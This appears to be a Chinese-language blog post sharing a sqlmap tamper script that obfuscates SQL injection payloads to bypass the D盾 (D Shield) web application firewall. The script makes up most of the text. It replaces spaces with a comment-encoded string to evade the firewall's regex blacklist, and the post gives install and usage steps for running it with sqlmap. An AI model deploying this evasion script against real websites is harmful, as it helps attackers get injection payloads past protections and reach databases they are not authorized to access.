1. 程式人生 > 其它 >sqlmap繞過d盾_姿勢分享——SQL注入bypass D盾

sqlmap繞過d盾_姿勢分享——SQL注入bypass D盾

技術標籤:sqlmap繞過d盾

afc9b0edc6f837a36e93dbbfdad61842.gif

首先感謝兄弟們的支援與關注,我們的成長離不開您的陪伴

在我們做專案的途中經常會遇到各種各樣的waf,防火牆等來攔截我們的payload,這很是讓滲透測試人員頭疼,其實網上就有很多關於waf繞過原理的文章,這篇文章就是想告訴大家,當大家理解了網上關於waf繞過的文章的內容並對其原理了解後,其實把理論深化進實踐中並沒有多困難,本篇文章就是將一個簡單常規的小思路實踐了一下,便成功繞過了D盾的waf

關於sql注入的waf繞過,說白了就是通過混淆你的sql語句,讓他以另外一種方式呈現出來,以繞過waf的黑名單正則匹配,關於sql注入waf繞過的原理在這篇文章裡不再重複,我們直接來看例項,分享一種bypass D盾的方法,這裡直接貼上tamper。

話不多說,來看程式碼:

#!/usr/bin/env pythonfrom lib.core.enums import PRIORITY__priority__ = PRIORITY.LOWdef dependencies():    passdef tamper(payload, **kwargs):    """            BYPASS Ddun    """    retVal = payload    if payload:                                                                                       retVal = ""         quote, doublequote, firstspace = False, False, False        for i in xrange(len(payload)):            if not firstspace:                if payload[i].isspace():                    firstspace = True                    retVal += "/*DJSAWW%2B%26Lt%3B%2B*/"                    continue            elif payload[i] == '\'':                quote = not quote            elif payload[i] == '"':                doublequote = not doublequote            elif payload[i] == " " and not doublequote and not quote:                retVal += "/*DJSAWW%2B%26Lt%3B%2B*/"                continue            retVal += payload[i]    return retVal

使用方法:

將以上程式碼儲存為BypassDdun.py,並放進sqlmap的\tamper目錄,在下一次使用sqlmap的時候,引數加--tamper=BypassDdun即可呼叫這個指令碼。

如果您覺得文章對您有幫助,點下關注不迷路,日常分享滲透測試騷姿勢,我們的成長離不開您的陪伴。